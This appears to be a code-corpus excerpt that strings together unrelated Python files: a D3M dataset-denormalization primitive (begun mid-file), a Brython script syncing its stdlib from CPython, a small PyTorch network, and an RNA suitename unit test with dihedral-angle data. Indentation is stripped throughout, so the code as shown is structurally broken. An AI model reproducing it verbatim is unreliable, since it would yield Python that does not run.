recursive = hyperparams.UniformBool(
default=True,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="Denormalize recursively?",
)
many_to_many = hyperparams.UniformBool(
default=False,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="Denormalize also many-to-many relations?",
)
discard_not_joined_tabular_resources = hyperparams.UniformBool(
default=False,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="Should tabular resources which were not joined be discarded?",
)
# TODO: Implement support for M2M relations.
# TODO: Consider the case where there are loops in foreign keys.
# TODO: Add all column names together to "other names" metadata for column.
# TODO: Consider denormalizing deep-first instead of current iterative approach.
# It seems it might be better because when one table is referencing the second one twice,
# which might reference other tables further, then currently we first join the second table
# and then have to repeat joining other tables twice. But we could first join other tables
# once to the second table, and then just do the join with already joined second table.
# Not sure how to behave in "recursive == False" case then.
# TODO: Add a test where main table has a foreign key twice to same table (for example, person 1 and person 2 to table of persons).
class DenormalizePrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]):
"""
A primitive which converts a Dataset with multiple tabular resources into a Dataset with only one tabular resource,
based on known relations between tabular resources. Any resource which can be joined is joined (thus the resource
itself is removed), and other resources are by default discarded (controlled by ``discard_resources`` hyper-parameter).
If hyper-parameter ``recursive`` is set to ``True``, the primitive will join tables recursively. For example,
if table 1 (main table) has a foreign key that points to table 2, and table 2 has a foreign key that points to table 3,
then after table 2 is jointed into table 1, table 1 will have a foreign key that points to table 3. So now the
primitive continues to join table 3 into the main table.
"""
__author__ = '<NAME> <<EMAIL>>'
metadata = metadata_base.PrimitiveMetadata(
{
'id': 'f31f8c1f-d1c5-43e5-a4b2-2ae4a761ef2e',
'version': '0.2.0',
'name': "Denormalize datasets",
'python_path': 'd3m.primitives.autovideo.common.denormalize',
'source': {
'name':'<NAME> - <NAME>',
'contact': 'mailto:<EMAIL>',
'uris': [
'https://gitlab.com/datadrivendiscovery/common-primitives/blob/master/common_primitives/denormalize.py',
'https://gitlab.com/datadrivendiscovery/common-primitives.git',
],
},
'algorithm_types': [
metadata_base.PrimitiveAlgorithmType.DATA_DENORMALIZATION,
],
'primitive_family': metadata_base.PrimitiveFamily.DATA_TRANSFORMATION,
},
)
def __init__(self, *, hyperparams: Hyperparams) -> None:
super().__init__(hyperparams=hyperparams)
def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]:
# If only one tabular resource is in the dataset, we do not have anything to do.
tabular_resource_ids = [dataset_resource_id for dataset_resource_id, dataset_resource in inputs.items() if isinstance(dataset_resource, container.DataFrame)]
if len(tabular_resource_ids) == 1:
return base.CallResult(inputs)
# We could set "pick_one" to "False" because we already checked for that, but we leave it
# as "True" because then error messages are more meaningful for this case.
main_resource_id, main_resource = base_utils.get_tabular_resource(inputs, self.hyperparams['starting_resource'])
# Graph is the adjacency representation for the relations graph.
graph = inputs.get_relations_graph()
resources = dict(inputs)
metadata = inputs.metadata
all_resources_joined = set()
while self._has_forward_edges(graph, main_resource_id):
# "resources" and "graph" are modified in-place.
metadata, resources_joined = self._denormalize(resources, metadata, main_resource_id, graph)
all_resources_joined.update(resources_joined)
if not self.hyperparams['recursive']:
break
# Do we discard all other tabular resources (including joined ones)?
if self.hyperparams['discard_not_joined_tabular_resources']:
resources_to_remove = []
for resource_id, resource in resources.items():
if resource_id == main_resource_id:
continue
if not isinstance(resource, container.DataFrame):
continue
resources_to_remove.append(resource_id)
# Discard only joined tabular resources and which no other resource depends on.
else:
# We deal only with tabular resources here.
dependent_upon_resources = self._get_dependent_upon_resources(graph)
resources_to_remove = [resource_id for resource_id in sorted(all_resources_joined - dependent_upon_resources) if resource_id != main_resource_id]
for resource_id in resources_to_remove:
assert resource_id != main_resource_id
del resources[resource_id]
metadata = metadata.remove((resource_id,), recursive=True)
metadata = metadata.update((), {
'dimension': {
'length': len(resources),
},
})
return base.CallResult(container.Dataset(resources, metadata))
def _has_forward_edges(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]], resource_id: str) -> bool:
# We check first to not create a list in "graph" when accessing it.
if resource_id not in graph:
return False
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in graph[resource_id]:
if edge_direction:
return True
return False
def _has_edges_to_process(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]], resource_id: str) -> bool:
# We check first to not create a list in "graph" when accessing it.
if resource_id not in graph:
return False
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in graph[resource_id]:
if custom_state.get('process', False):
return True
return False
def _denormalize(self, resources: typing.Dict, metadata: metadata_base.DataMetadata, main_resource_id: str,
graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]]) -> typing.Tuple[metadata_base.DataMetadata, typing.Set[str]]:
"""
Finds all tables which are pointed to by the main resource and join them into the main table.
``resources`` and ``graph`` are modified in-place.
"""
resources_joined: typing.Set[str] = set()
main_resource = resources[main_resource_id]
# Should not really happen.
if main_resource_id not in graph:
return metadata, resources_joined
# We mark all current edges to be processed. We might be adding more edges to the list,
# but we want to do for this call only those which existed at the beginning.
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in graph[main_resource_id]:
custom_state['process'] = True
while self._has_edges_to_process(graph, main_resource_id):
edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state = graph[main_resource_id][0]
if not custom_state.get('process', False):
continue
del custom_state['process']
if not edge_direction:
# For now we just remove this relation.
# TODO: Support M2M relations.
# We remove the relation we would have joined, backward.
self._remove_graph_edge(graph, main_resource_id, edge_resource_id, False, edge_from_index, edge_to_index)
# We remove the relation we would have joined, forward.
self._remove_graph_edge(graph, edge_resource_id, main_resource_id, True, edge_to_index, edge_from_index)
continue
if main_resource_id == edge_resource_id:
# TODO: Implement.
raise NotImplementedError("Support for loops is not implemented yet.")
# Calling "_join" updates column indices in "graph" and "metadata"
# and also removes the current joined edge from "graph"
main_resource, metadata = self._join(
main_resource_id, main_resource, edge_from_index,
edge_resource_id, resources[edge_resource_id], edge_to_index,
metadata, graph,
)
resources_joined.add(edge_resource_id)
resources[main_resource_id] = main_resource
return metadata, resources_joined
def _row_of_missing_values(self, resource: container.DataFrame, metadata: metadata_base.DataMetadata, resource_id: str) -> typing.List[typing.Any]:
row = []
for column_index, dtype in enumerate(resource.dtypes):
if dtype.kind in ['b', 'i', 'u', 'f', 'c']:
row.append(numpy.nan)
elif dtype.kind == 'O' and issubclass(metadata.query_column_field(column_index, 'structural_type', at=(resource_id,)), str):
row.append('')
else:
row.append(None)
return row
def _join(self, main_resource_id: str, main_resource: container.DataFrame, main_column_index: int, foreign_resource_id: str,
foreign_resource: container.DataFrame, foreign_column_index: int, metadata: metadata_base.DataMetadata,
graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]]) -> typing.Tuple[container.DataFrame, metadata_base.DataMetadata]:
if main_resource_id == foreign_resource_id:
# TODO: Implement.
raise NotImplementedError("Support for loops is not implemented yet.")
# We use this information later on.
one_to_one_relation = foreign_resource.iloc[:, foreign_column_index].sort_values().equals(main_resource.iloc[:, main_column_index].sort_values())
foreign_indexer = pandas.Index(foreign_resource.iloc[:, foreign_column_index]).get_indexer(main_resource.iloc[:, main_column_index])
# "get_indexer" sets all unresolved values to -1.
unresolved_rows = foreign_indexer == -1
# We store dtypes so that we can later on compare.
foreign_resource_dtypes = foreign_resource.dtypes
# -1 is converted into the last row, but we set it to row of missing values if it exists.
resolved_foreign_resource = foreign_resource.take(foreign_indexer).reset_index(drop=True)
if unresolved_rows.any():
# Set all unresolved rows to a row of missing values.
resolved_foreign_resource.iloc[unresolved_rows, :] = self._row_of_missing_values(foreign_resource, metadata, foreign_resource_id)
# And store final dtypes so that we can later on compare.
resolved_foreign_resource_dtypes = resolved_foreign_resource.dtypes
# This makes a copy so that we can modify metadata in-place.
metadata = metadata.update(
(metadata_base.ALL_ELEMENTS,),
{},
)
# TODO: Move this to metadata API.
# We reorder metadata for rows.
for element_metadata_entry in [
metadata._current_metadata.all_elements,
metadata._current_metadata.elements[foreign_resource_id],
]:
if element_metadata_entry is None:
continue
elements = element_metadata_entry.elements
new_elements_evolver = d3m_utils.EMPTY_PMAP.evolver()
for i, row_index in enumerate(foreign_indexer):
if row_index == -1:
continue
if row_index in elements:
new_elements_evolver.set(i, elements[row_index])
element_metadata_entry.elements = new_elements_evolver.persistent()
element_metadata_entry.is_elements_empty = not element_metadata_entry.elements
element_metadata_entry.update_is_empty()
assert resolved_foreign_resource.shape[1] > 0
main_resource = pandas.concat([
main_resource.iloc[:, 0:main_column_index],
resolved_foreign_resource,
main_resource.iloc[:, main_column_index + 1:],
], axis=1)
old_semantic_types = metadata.query_column(main_column_index, at=(main_resource_id,)).get('semantic_types', [])
# First we remove metadata for the existing column.
# This makes a copy so that we can modify metadata in-place.
metadata = metadata.remove_column(main_column_index, at=(main_resource_id,), recursive=True)
# TODO: Move this to metadata API.
# Move columns and make space for foreign metadata to be inserted.
# We iterate over a list so that we can change dict while iterating.
for element_metadata_entry in itertools.chain(
[metadata._current_metadata.all_elements.all_elements if metadata._current_metadata.all_elements is not None else None],
metadata._current_metadata.all_elements.elements.values() if metadata._current_metadata.all_elements is not None else iter([None]),
[metadata._current_metadata.elements[main_resource_id].all_elements],
metadata._current_metadata.elements[main_resource_id].elements.values(),
):
if element_metadata_entry is None:
continue
new_elements_evolver = element_metadata_entry.elements.evolver()
for element_index in element_metadata_entry.elements.keys(reverse=True):
# We removed metadata for "main_column_index".
assert element_index != main_column_index
element_index = typing.cast(int, element_index)
if main_column_index < element_index:
metadata_dict = new_elements_evolver[element_index]
new_elements_evolver.remove(element_index)
new_elements_evolver.set(element_index + resolved_foreign_resource.shape[1] - 1, metadata_dict)
element_metadata_entry.elements = new_elements_evolver.persistent()
element_metadata_entry.is_elements_empty = not element_metadata_entry.elements
element_metadata_entry.update_is_empty()
# And copy over metadata for new (replaced) columns in place of the existing column.
for column_index in range(resolved_foreign_resource.shape[1]):
# To go over "ALL_ELEMENTS" and all rows.
for element in metadata.get_elements((foreign_resource_id,)):
metadata = metadata.copy_to(
metadata,
[foreign_resource_id, element, metadata_base.ALL_ELEMENTS],
[main_resource_id, element, main_column_index + column_index],
ignore_all_elements=True,
)
metadata = metadata.copy_to(
metadata,
[foreign_resource_id, element, column_index],
[main_resource_id, element, main_column_index + column_index],
ignore_all_elements=True,
)
# Update metadata for new (replaced) columns.
for column_index in range(main_column_index, main_column_index + resolved_foreign_resource.shape[1]):
# We copy semantic types describing the role of the column from the original column to all new (replaced) columns.
# TODO: Do not hard-code this list here but maybe extract it from "definitions.json"?
for semantic_type in [
'https://metadata.datadrivendiscovery.org/types/Attribute',
'https://metadata.datadrivendiscovery.org/types/Boundary',
'https://metadata.datadrivendiscovery.org/types/BoundingPolygon',
'https://metadata.datadrivendiscovery.org/types/Interval',
'https://metadata.datadrivendiscovery.org/types/IntervalEnd',
'https://metadata.datadrivendiscovery.org/types/IntervalStart',
'https://metadata.datadrivendiscovery.org/types/InstanceWeight',
'https://metadata.datadrivendiscovery.org/types/PrivilegedData',
'https://metadata.datadrivendiscovery.org/types/RedactedPrivilegedData',
'https://metadata.datadrivendiscovery.org/types/RedactedTarget',
'https://metadata.datadrivendiscovery.org/types/SuggestedPrivilegedData',
'https://metadata.datadrivendiscovery.org/types/SuggestedTarget',
'https://metadata.datadrivendiscovery.org/types/Target',
'https://metadata.datadrivendiscovery.org/types/PredictedTarget',
'https://metadata.datadrivendiscovery.org/types/TrueTarget',
'https://metadata.datadrivendiscovery.org/types/Score',
'https://metadata.datadrivendiscovery.org/types/Confidence',
'https://metadata.datadrivendiscovery.org/types/Time',
'https://metadata.datadrivendiscovery.org/types/Location',
]:
if semantic_type in old_semantic_types:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), semantic_type)
is_column_unique = main_resource.iloc[:, column_index].is_unique
column_semantic_types = metadata.query_column(column_index, at=(main_resource_id,)).get('semantic_types', [])
was_column_unique = 'https://metadata.datadrivendiscovery.org/types/PrimaryKey' in column_semantic_types \
or 'https://metadata.datadrivendiscovery.org/types/UniqueKey' in column_semantic_types
# Foreign keys can reference same foreign row multiple times, so values in this column might not be even
# unique anymore, nor they are a primary key at all. So we remove the semantic type marking a column as such.
# We re-set semantic type for any real primary key later on.
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryKey')
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey')
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/UniqueKey')
# We re-set semantic type for column which was and is still unique.
if was_column_unique and is_column_unique:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/UniqueKey')
old_dtype = foreign_resource_dtypes.iloc[column_index - main_column_index]
new_dtype = resolved_foreign_resource_dtypes.iloc[column_index - main_column_index]
if old_dtype is not new_dtype:
# Not a nice way to convert a dtype to Python type, but it works.
old_type = type(numpy.zeros(1, old_dtype).tolist()[0])
new_type = type(numpy.zeros(1, new_dtype).tolist()[0])
if old_type is not new_type:
# Type changed, we have to update metadata about the structural type.
metadata = metadata.update((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), {
'structural_type': new_type,
})
# If the original column was a primary key, we should re-set it back.
if 'https://metadata.datadrivendiscovery.org/types/PrimaryKey' in old_semantic_types and (one_to_one_relation or not unresolved_rows.any()):
if main_resource.iloc[:, main_column_index].is_unique:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryKey')
# Removing "UniqueKey" if it was set before, "PrimaryKey" surpasses it.
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/UniqueKey')
else:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey')
elif 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey' in old_semantic_types and (one_to_one_relation or not unresolved_rows.any()):
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey')
# TODO: Update boundary columns and "confidence for" references.
# This is not currently needed because all file collections are just one column so they do not
# move the column indices. But as a general case we should be updating all standard column references.
# Update columns number in the main resource.
metadata = metadata.update((main_resource_id, metadata_base.ALL_ELEMENTS), {
'dimension': {
'length': main_resource.shape[1],
},
})
# We remove the relation we just joined, forward.
self._remove_graph_edge(graph, main_resource_id, foreign_resource_id, True, main_column_index, foreign_column_index)
# We remove the relation we just joined, backward.
self._remove_graph_edge(graph, foreign_resource_id, main_resource_id, False, foreign_column_index, main_column_index)
# We have to update column indices if they have changed because we inserted new columns.
for resource_id, edges in graph.items():
if resource_id == main_resource_id:
for i, (edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state) in enumerate(edges):
if edge_direction and main_column_index < edge_from_index:
# We replaced one column with "resolved_foreign_resource.shape[1]" columns, so there is
# "resolved_foreign_resource.shape[1] - 1" new columns to shift indices for.
edges[i] = (edge_resource_id, edge_direction, edge_from_index + resolved_foreign_resource.shape[1] - 1, edge_to_index, custom_state)
else:
for i, (edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state) in enumerate(edges):
if edge_resource_id == main_resource_id and not edge_direction and main_column_index < edge_to_index:
# We replaced one column with "resolved_foreign_resource.shape[1]" columns, so there is
# "resolved_foreign_resource.shape[1] - 1" new columns to shift indices for.
edges[i] = (edge_resource_id, edge_direction, edge_from_index, edge_to_index + resolved_foreign_resource.shape[1] - 1, custom_state)
# If foreign resource has any additional relations, we copy them to new columns in the main resource.
if foreign_resource_id in graph:
# We iterate over a list so that we can change graph while iterating.
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in list(graph[foreign_resource_id]):
if edge_resource_id in [main_resource_id, foreign_resource_id]:
# TODO: Implement.
raise NotImplementedError("Support for loops is not implemented yet.")
if edge_direction:
graph[main_resource_id].append((edge_resource_id, True, main_column_index + edge_from_index, edge_to_index, {}))
graph[edge_resource_id].append((main_resource_id, False, edge_to_index, main_column_index + edge_from_index, {}))
else:
# TODO: What should we do about backward relations?
# For now we just ignore backward relations because we do not support M2M relations.
# For the foreign resource we just joined, we could change all relations to instead point
# to the main resource. This might be tricky though if we have a situation where main table
# includes table 1 twice, and table 1 has a relation to table 2. If we after joining table 1
# once rewrite all backward relations from table 2 to table 1 to point to main table now,
# when we get to join the table 1 the second time we might have issues. This is why it might
# better to start joining deep-first. See another TODO.
# TODO: We might have to also update foreign key metadata in this case.
# We might want to update metadata so that if table 1 is joined to the main table, and there is
# also table 2 which has a foreign key that points to table 1, then the foreign key in table 2
# should point to the main table after joining. But what if main table has a foreign key to
# table 1 twice? How do we then update metadata in table 2 to point twice to table 1?
# Metadata does not support that.
# A special case for now. If relation is one-to-one, then we can move backwards relations to the
# main resource without complications mentioned in TODOs above. Maybe some additional columns might
# be joined through M2M relations in this case, once that is supported, but generally this should not
# be a problem. It might add some duplicated columns at that point. This special case is useful
# when "learningData" with only targets is pointing to some other table with real attributes.
if one_to_one_relation:
self._remove_graph_edge(graph, edge_resource_id, foreign_resource_id, True, edge_to_index, edge_from_index)
self._remove_graph_edge(graph, foreign_resource_id, edge_resource_id, False, edge_from_index, edge_to_index)
graph[main_resource_id].append((edge_resource_id, False, main_column_index + edge_from_index, edge_to_index, custom_state))
graph[edge_resource_id].append((main_resource_id, True, edge_to_index, main_column_index + edge_from_index, custom_state))
# We override metadata for foreign key to make it point to the main resource (and not to foreign resource anymore).
metadata = metadata.update((edge_resource_id, metadata_base.ALL_ELEMENTS, edge_to_index), {
'foreign_key': {
'type': 'COLUMN',
'resource_id': main_resource_id,
'column_index': main_column_index + edge_from_index,
'column_name': metadata_base.NO_VALUE,
},
})
return main_resource, metadata
def _get_dependent_upon_resources(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]]) -> typing.Set[str]:
"""
Returns a set of resources which have other resources depend on them.
"""
dependent_upon_resources = set()
for resource_id, edges in graph.items():
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in edges:
if edge_direction:
dependent_upon_resources.add(edge_resource_id)
return dependent_upon_resources
def _remove_graph_edge(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]],
resource_id: str, edge_resource_id: str, edge_direction: bool, edge_from_index: int, edge_to_index: int) -> None:
assert resource_id in graph
for i, edge in enumerate(graph[resource_id]):
if edge[0:4] == (edge_resource_id, edge_direction, edge_from_index, edge_to_index):
del graph[resource_id][i]
break
if not graph[resource_id]:
del graph[resource_id]
if __name__ == '__main__':
import logging
import pprint
import sys
logging.basicConfig()
for dataset_file_path in sys.argv[1:]:
try:
dataset = container.Dataset.load('file://{dataset_doc_path}'.format(dataset_doc_path=os.path.abspath(dataset_file_path)))
except Exception as error:
raise Exception("Unable to load dataset: {dataset_doc_path}".format(dataset_doc_path=dataset_file_path)) from error
primitive = DenormalizePrimitive(hyperparams=Hyperparams.defaults().replace({
'recursive': True,
'discard_not_joined_tabular_resources': False,
}))
try:
denormalized_dataset = primitive.produce(inputs=dataset).value
pprint.pprint(denormalized_dataset)
denormalized_dataset.metadata.pretty_print()
except Exception as error:
raise Exception("Unable to denormalize dataset: {dataset_doc_path}".format(dataset_doc_path=dataset_file_path)) from error
|
scripts/update_stlib_from_cpython.py | mementum/brython | 5,926 | 12664099 | <gh_stars>1000+
# compare Brython stdlib and CPython stdlib
import os
import filecmp
import shutil
bdir = os.path.join(os.path.dirname(os.getcwd()),
"www", "src", "Lib")
p_old_dir = r'c:\Python39\Lib'
p_new_dir = r'c:\Python310\Lib'
for dirpath, dirnames, filenames in os.walk(bdir):
if "site-packages" in dirnames:
dirnames.remove("site-packages")
prefix = dirpath[len(bdir) + 1:]
print(prefix)
for filename in filenames:
if not filename.endswith(".py"):
continue
ppath = p_old_dir + "\\" + prefix + "\\" + filename
if os.path.exists(ppath):
brython_path = os.path.join(dirpath, filename)
brython_short = brython_path[len(bdir) + 1:]
if filecmp.cmp(brython_path, ppath, shallow=False):
p_new_path = p_new_dir + "\\" + prefix + "\\" + filename
if os.path.exists(p_new_path):
if filecmp.cmp(brython_path, p_new_path, shallow=False):
#print(brython_short, "same as CPython 3.9",
# "not changed in Python 3.10")
pass
else:
print(brython_short, "same as CPython 3.9",
"replace by 3.10 version")
shutil.copyfile(p_new_path, brython_path)
else:
print('***', brython_short, "same as CPython 3.9",
"not in Python 3.10")
else:
p_new_path = p_new_dir + "\\" + prefix + "\\" + filename
if os.path.exists(p_new_path):
if filecmp.cmp(brython_path, p_new_path, shallow=False):
#print(brython_short, "already changed to Python 3.10")
pass
else:
print('***', brython_short, 'not the same as CPython 3.9')
else:
print('***', brython_short, "not in Python 3.10")
else:
p_new_path = p_new_dir + "\\" + prefix + "\\" + filename
if os.path.exists(p_new_path):
print(ppath, "not in CPython 3.9, but present in 3.10")
else:
print(ppath, "not in CPython 3.9 and 3.10")
|
alg/edm/network/student_network.py | loramf/mlforhealthlabpub | 171 | 12664158 | from .base_network import *
class StudentNetwork(BaseNetwork):
def __init__(self,
in_dim : int,
out_dim : int,
width : int,
):
super(StudentNetwork, self).__init__()
self.in_dim = in_dim
self.out_dim = out_dim
self.width = width
self.layers = nn.Sequential(
nn.Linear(in_dim, width),
nn.ELU(),
nn.Linear(width, width),
nn.ELU(),
nn.Linear(width, out_dim),
)
def forward(self,
x : torch.Tensor,
) -> torch.Tensor:
return self.layers(x)
|
mmtbx/suitename/unit-test/UnitTest.py | dperl-sol/cctbx_project | 155 | 12664161 | <gh_stars>100-1000
from __future__ import nested_scopes, generators, division, absolute_import
from __future__ import with_statement, print_function
import os, sys, inspect
from io import StringIO
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
# here, before importing suitename, is an opportunity to set command line
# options and to redirect output.
# sys.argv.extend(["--noinc", "--chart", "--causes"])
# sys.stdout = open("output.txt", "w")
import suitename, suites, regression
# The test data:
#
# The first portion is to test membership in every cluster.
# The second portion is to test triage by out of bounds angle
# for each dihedral angle. The unnecessary part of each residue is damaged so
# the extra suite generated will be incomplete and will vanish.
input1=u''' :1a: : : : : Z: 9999.000: 9999.000: 9999.000: 81.495: 212.250: 288.831: 180.000
:1a: : : : : Z: 294.967: 173.990: 53.550: 81.035: 9999.000: 9999.000: 180.000
:1m: : : : : Z: 9999.000: 9999.000: 9999.000: 83.513: 218.120: 291.593: 180.000
:1m: : : : : Z: 292.247: 222.300: 58.067: 86.093: 9999.000: 9999.000: 180.000
:1L: : : : : Z: 9999.000: 9999.000: 9999.000: 85.664: 245.014: 268.257: 180.000
:1L: : : : : Z: 303.879: 138.164: 61.950: 79.457: 9999.000: 9999.000: 180.000
:&a: : : : : Z: 9999.000: 9999.000: 9999.000: 82.112: 190.682: 264.945: 180.000
:&a: : : : : Z: 295.967: 181.839: 51.455: 81.512: 9999.000: 9999.000: 180.000
:7a: : : : : Z: 9999.000: 9999.000: 9999.000: 83.414: 217.400: 222.006: 180.000
:7a: : : : : Z: 302.856: 160.719: 49.097: 82.444: 9999.000: 9999.000: 180.000
:3a: : : : : Z: 9999.000: 9999.000: 9999.000: 85.072: 216.324: 173.276: 180.000
:3a: : : : : Z: 289.320: 164.132: 45.876: 84.956: 9999.000: 9999.000: 180.000
:9a: : : : : Z: 9999.000: 9999.000: 9999.000: 83.179: 210.347: 121.474: 180.000
:9a: : : : : Z: 288.568: 157.268: 49.347: 81.047: 9999.000: 9999.000: 180.000
:1g: : : : : Z: 9999.000: 9999.000: 9999.000: 80.888: 218.636: 290.735: 180.000
:1g: : : : : Z: 167.447: 159.565: 51.326: 85.213: 9999.000: 9999.000: 180.000
:7d: : : : : Z: 9999.000: 9999.000: 9999.000: 83.856: 238.750: 256.875: 180.000
:7d: : : : : Z: 69.562: 170.200: 52.800: 85.287: 9999.000: 9999.000: 180.000
:3d: : : : : Z: 9999.000: 9999.000: 9999.000: 85.295: 244.085: 203.815: 180.000
:3d: : : : : Z: 65.880: 181.130: 54.680: 86.035: 9999.000: 9999.000: 180.000
:5d: : : : : Z: 9999.000: 9999.000: 9999.000: 79.671: 202.471: 63.064: 180.000
:5d: : : : : Z: 68.164: 143.450: 49.664: 82.757: 9999.000: 9999.000: 180.000
:3g: : : : : Z: 9999.000: 9999.000: 9999.000: 84.000: 195.000: 146.000: 180.000
:3g: : : : : Z: 170.000: 170.000: 52.000: 84.000: 9999.000: 9999.000: 180.000
:1e: : : : : Z: 9999.000: 9999.000: 9999.000: 80.514: 200.545: 280.510: 180.000
:1e: : : : : Z: 249.314: 82.662: 167.890: 85.507: 9999.000: 9999.000: 180.000
:1c: : : : : Z: 9999.000: 9999.000: 9999.000: 80.223: 196.591: 291.299: 180.000
:1c: : : : : Z: 153.060: 194.379: 179.061: 83.648: 9999.000: 9999.000: 180.000
:1f: : : : : Z: 9999.000: 9999.000: 9999.000: 81.395: 203.030: 294.445: 180.000
:1f: : : : : Z: 172.195: 138.540: 175.565: 84.470: 9999.000: 9999.000: 180.000
:5j: : : : : Z: 9999.000: 9999.000: 9999.000: 87.417: 223.558: 80.175: 180.000
:5j: : : : : Z: 66.667: 109.150: 176.475: 83.833: 9999.000: 9999.000: 180.000
:5n: : : : : Z: 9999.000: 9999.000: 9999.000: 86.055: 246.502: 100.392: 180.000
:5n: : : : : Z: 73.595: 213.752: 183.395: 85.483: 9999.000: 9999.000: 180.000
:!!: : : : : Z: 9999.000: 9999.000: 9999.000: 0.000: 0.000: 0.000: 0.000
:!!: : : : : Z: 0.000: 0.000: 0.000: 0.000: 9999.000: 9999.000: 0.000
:1b: : : : : Z: 9999.000: 9999.000: 9999.000: 84.215: 215.014: 288.672: 180.000
:1b: : : : : Z: 300.420: 177.476: 58.307: 144.841: 9999.000: 9999.000: 180.000
:1[: : : : : Z: 9999.000: 9999.000: 9999.000: 82.731: 220.463: 288.665: 180.000
:1[: : : : : Z: 296.983: 221.654: 54.213: 143.771: 9999.000: 9999.000: 180.000
:3b: : : : : Z: 9999.000: 9999.000: 9999.000: 84.700: 226.400: 168.336: 180.000
:3b: : : : : Z: 292.771: 177.629: 48.629: 147.950: 9999.000: 9999.000: 180.000
:1z: : : : : Z: 9999.000: 9999.000: 9999.000: 83.358: 206.042: 277.567: 180.000
:1z: : : : : Z: 195.700: 161.600: 50.750: 145.258: 9999.000: 9999.000: 180.000
:5z: : : : : Z: 9999.000: 9999.000: 9999.000: 82.614: 206.440: 52.524: 180.000
:5z: : : : : Z: 163.669: 148.421: 50.176: 147.590: 9999.000: 9999.000: 180.000
:7p: : : : : Z: 9999.000: 9999.000: 9999.000: 84.285: 236.600: 220.400: 180.000
:7p: : : : : Z: 68.300: 200.122: 53.693: 145.730: 9999.000: 9999.000: 180.000
:5p: : : : : Z: 9999.000: 9999.000: 9999.000: 84.457: 213.286: 69.086: 180.000
:5p: : : : : Z: 75.500: 156.671: 57.486: 147.686: 9999.000: 9999.000: 180.000
:1t: : : : : Z: 9999.000: 9999.000: 9999.000: 81.200: 199.243: 288.986: 180.000
:1t: : : : : Z: 180.286: 194.743: 178.200: 147.386: 9999.000: 9999.000: 180.000
:5q: : : : : Z: 9999.000: 9999.000: 9999.000: 82.133: 204.933: 69.483: 180.000
:5q: : : : : Z: 63.417: 115.233: 176.283: 145.733: 9999.000: 9999.000: 180.000
:1o: : : : : Z: 9999.000: 9999.000: 9999.000: 83.977: 216.508: 287.192: 180.000
:1o: : : : : Z: 297.254: 225.154: 293.738: 150.677: 9999.000: 9999.000: 180.000
:7r: : : : : Z: 9999.000: 9999.000: 9999.000: 84.606: 232.856: 248.125: 180.000
:7r: : : : : Z: 63.269: 181.975: 295.744: 149.744: 9999.000: 9999.000: 180.000
:5r: : : : : Z: 9999.000: 9999.000: 9999.000: 83.000: 196.900: 65.350: 180.000
:5r: : : : : Z: 60.150: 138.425: 292.550: 154.275: 9999.000: 9999.000: 180.000
:2a: : : : : Z: 9999.000: 9999.000: 9999.000: 145.399: 260.339: 288.756: 180.000
:2a: : : : : Z: 288.444: 192.733: 53.097: 84.067: 9999.000: 9999.000: 180.000
:4a: : : : : Z: 9999.000: 9999.000: 9999.000: 146.275: 259.783: 169.958: 180.000
:4a: : : : : Z: 298.450: 169.583: 50.908: 83.967: 9999.000: 9999.000: 180.000
:0a: : : : : Z: 9999.000: 9999.000: 9999.000: 149.286: 223.159: 139.421: 180.000
:0a: : : : : Z: 284.559: 158.107: 47.900: 84.424: 9999.000: 9999.000: 180.000
:#a: : : : : Z: 9999.000: 9999.000: 9999.000: 148.006: 191.944: 146.231: 180.000
:#a: : : : : Z: 289.288: 150.781: 42.419: 84.956: 9999.000: 9999.000: 180.000
:4g: : : : : Z: 9999.000: 9999.000: 9999.000: 148.028: 256.922: 165.194: 180.000
:4g: : : : : Z: 204.961: 165.194: 49.383: 82.983: 9999.000: 9999.000: 180.000
:6g: : : : : Z: 9999.000: 9999.000: 9999.000: 145.337: 262.869: 79.588: 180.000
